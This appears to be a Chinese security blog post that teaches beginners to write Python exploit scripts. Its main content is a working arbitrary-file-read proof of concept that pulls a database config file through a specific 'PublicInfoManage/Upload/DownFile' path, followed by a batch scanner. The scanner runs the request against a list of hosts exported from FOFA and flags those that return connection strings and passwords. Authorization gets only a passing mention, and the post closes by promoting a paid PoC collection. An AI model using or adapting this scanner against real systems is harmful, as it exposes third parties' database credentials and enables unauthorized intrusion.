漏洞挖掘-小白编写人生中第一个漏洞利用脚本

原创 小白 吉吉说安全 2024-11-25 00:45

上次讲到了小白如何通过网络安全赚取自己人生中的第一桶金
，上上篇文章的预告小白如何从脚本小子编写一个简单的脚本拖到现在，终于有时间来更新了。

作为小白我们在编写脚本的时候选择编程语言尽量选择好上手的，市面上常见的有java、php、python、
golang
等等
，
java编写图形化
界面可以，但是上手比较难，php的话web界面还可以，这里面作者认为python是很好上手的，几天甚至几小时可能就能自己上手了。

首先就是安装，我们直接去官网
https://www.python.org/downloads/下载，如下图所示

windows版本的：下载好安装包后我们直接和正常安装软件一样一直下一步下一步即可，安装好打开cmd直接 
python -V
如果出现版本信息即可

安装好后我们还需要安装一个非常非常重要的模块
requests,
这个模块可以模拟网页请求很重要‼️ 

cmd中输入
pip install 
requests
即可，我这里是安装好了的

编辑器的话随便一个都行，作者这里用的是vscode

https://vscode.github.net.cn/

下载好和正常程序一样安装好后打开即可使用

在任意地方创建一个py文件，如test.py,然后使用vscode打开

这里用这个任意文件读取漏洞来演示,上图抓包信息中可以看到可以读取到数据库的账号密码，我们用脚本来试试看能不能读取到敏感信息

import requests

poc_url="http://127.0.0.1/PublicInfoManage/Upload/DownFile?filePath=XmlConfig\database.config"

res=requests.get(url=poc_url)
r=res.text
print(r)

通过resquests.get请求一个带poc的url连接，然后res.text看是否有返回敏感信息，很显然这里是返回了说明了漏洞存在,一个简单的poc验证脚本就大功告成了，

如何进行批量检测呢？

先去百度搜索一个漏洞poc的语法，一找一大堆啊，当前前提是需要有授权哈不然就是非法违法的犯罪，搞不好就进去了，禁止用于非法哈

普通的fofa搜索不能导出也没有会员那咋办呢，很简单 我们去淘宝买一个就行几块十几块，我这里推荐一个我在用的哈，用起来还可以

我们通过语法直接导出就行，然后保存到urls.txt中，然后呢骚味改一下代码就行

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

with open('urls.txt') as f:
    f1=f.readlines()
poc="/PublicInfoManage/Upload/DownFile?filePath=XmlConfig\database.config"
for i in f1:
    url=i.replace("\n",'')
    res=requests.get(url=url+poc,verify=False)
    r=res.text
    if "connectionStrings" in r and "Password" in r:
        print(f"[+]{url} is True")

增加了一个for循环哈批量去读取url，然后带入poc如果响应包中存在
connectionStrings和
Password字符那就是存在，输出当前url 存在漏洞的信息，还是非常简单的哈，如下图所示

有了这些我们就可以去漏洞盒子刷分了，问就是起飞🛫️，肉蛋葱饥，芜湖。好好好，以后成为大神带带弟弟我吧呜呜呜

圈子的最近主题和圈子内部工具一些展示」

纷传100%
官方认证授权
，可在发现-圈子页面查看

poc漏洞库 8000+src陆续更新中 -紧跟时代发展争做先进网安人

一起愉快刷分-榜上有名

感谢您抽出..阅读本文

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为
此
承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！